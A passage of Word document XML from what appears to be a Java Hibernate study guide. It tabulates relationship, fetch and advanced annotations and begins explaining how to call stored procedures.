        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3615B03B"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Field is not persisted in the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="710290F5" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Relationship Mapp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07"/>
        <w:gridCol w:w="4688"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7FAAA871" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A7FF813" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5CA81F" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5C267935" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="510CE891"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OneToOne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7742E3B4"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One-to-one relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="700109AA" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B04DA2B"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OneToMany</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14327D63"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One-to-many relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="61265EBD" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72DCC2A1"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ManyToOne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A238EB4"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Many-to-one relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="7008855D" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180D6037"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ManyToMany</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5430D281"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Many-to-many relationship</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3E640941" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F12D36"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JoinColumn(name="...")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C601DCC"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pecifies foreign key column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="481D9714" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC3DD0E"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JoinTable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B041EC7"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Used in many-to-many mapping to define join table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="3C9E53A6" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3239AB7D"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mappedBy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6974B05A"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Used to define bidirectional relationships</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20FBD0D0" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Lifecycle and Fetch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67"/>
        <w:gridCol w:w="4578"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="41803D32" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7786764E" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C7577C2" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="217A2D6F" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FB87A68"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Fetch(FetchMode.JOIN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133CE06B"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pecifies fetch strategy (JOIN, SELECT, SUBSELECT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5D07BF91" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672DB684"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FetchType.LAZY / EAGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FBFD2D3"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pecifies when data is fetched</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="6C804027" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D4D127E"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ascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CB2611"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pecifies cascading operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F29FA2D" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Advanced Annot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70"/>
        <w:gridCol w:w="3434"/>
      </w:tblGrid>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="5E34ABBD" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="586F5A4D" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42E82087" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="766D1B46" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25AD638E"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NamedQuery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07D0F5A9"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Define static HQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="1B799F58" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52BC4630"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lastRenderedPageBreak/>
              <w:t>@Embedded / @Embeddable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BDD7FB9"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mbeds value types within an entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="2A583C66" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E2C338"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nheritance / @DiscriminatorColumn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D68036D"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nheritance mapping between classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F3379" w:rsidRPr="007F3379" w14:paraId="354C209E" w14:textId="77777777" w:rsidTr="00702DEA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1611D9B1"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45D91D76" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DE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For optimistic locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="448C24B1" w14:textId="77777777" w:rsidR="00702DEA"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9D38C3C">
          <v:rect id="_x0000_i2435" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F68653A" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300547C" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="007F3379" w:rsidRDefault="00702DEA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198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lasses</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Session, SessionFactory, and Transaction are core to interacting with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB600E5" w14:textId="77777777" w:rsidR="00702DEA" w:rsidRPr="00CE4B95" w:rsidRDefault="00702DEA" w:rsidP="007F3379">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1985"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to define how Java objects map to relational database tables and their relationships, behaviors, and constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8B094" w14:textId="7D1EBE49" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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FAF8F71">
          <v:rect id="_x0000_i2436" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF7992" w14:textId="655256DD" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74B00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="551" w:name="_Toc196308031"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to call stored procedures using hibernate?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="551"/>
    </w:p>
    <w:p w14:paraId="4F12AD4D" w14:textId="25E764FF" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Calling Stored Procedures Using Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F45A8"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You can call stored procedures in Hibernate using either </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate's @Query annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Below are the different approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056FF9FA" w14:textId="77777777" w:rsidR="006A0978"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0464C06">
          <v:rect id="_x0000_i2437" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5AB49" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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1. Using Hibernate Session.createSQLQuery() Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718E397"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You can use the createSQLQuery() method to execute stored procedures with Hibernate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFEA0E" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2922D887"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 session = sessionFactory.openSession();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D98AC9"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ransaction tx = session.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE1AE6" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4AAB7F"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Calling the stored procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A1D49E"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tring sql = "{call my_procedure(?, ?)}";  // Stored procedure with parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866950E"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QLQuery query = session.createSQLQuery(sql);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327103E4" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34AF1872"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Setting parameters (if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C49A65B"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setParameter(0, "param1_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FBBD6"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setParameter(1, "param2_value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55E538" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D478583"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Executing the stored procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9C948"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executeUpdate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0BAF10" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4447E5D5"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x.commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549014F"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC400E0"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n this example, my_procedure is the stored procedure name, and the ? placeholders are used for parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76626EA8" w14:textId="77777777" w:rsidR="006A0978"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3DF66F6">
          <v:rect id="_x0000_i2438" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="393C28B4" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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2. Using @Query Annotation in Hibernate (for Named Queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F25D07"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For simpler cases where you are using </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>native SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you can use @Query (in combination with Spring Data JPA or similar frameworks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7B501"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nativeQuery = true, value = "{call my_procedure(:param1, :param2)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17AA93"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void callStoredProcedure(@Param("param1") String param1, @Param("param2") String param2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F7A09F" w14:textId="77777777" w:rsidR="006A0978"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C7DAA9C">
          <v:rect id="_x0000_i2439" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9B7B8" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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3. Using StoredProcedureQuery in JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A0461"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n JPA (which Hibernate implements), you can use the StoredProcedureQuery to call stored procedures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C36E4B7" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F11467"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ntityManager em = entityManagerFactory.createEntityManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA877AD"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toredProcedureQuery storedProcedure = em.createStoredProcedureQuery("my_procedure");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690413E4" w14:textId="77777777" w:rsidR="006A0978" w:rsidRPr="007F3379" w:rsidRDefault="006A0978" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7C0F2F"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toredProcedure.registerStoredProcedureParameter(1, String.class, ParameterMode.IN);</w:t>
      </w:r>
    </w:p>
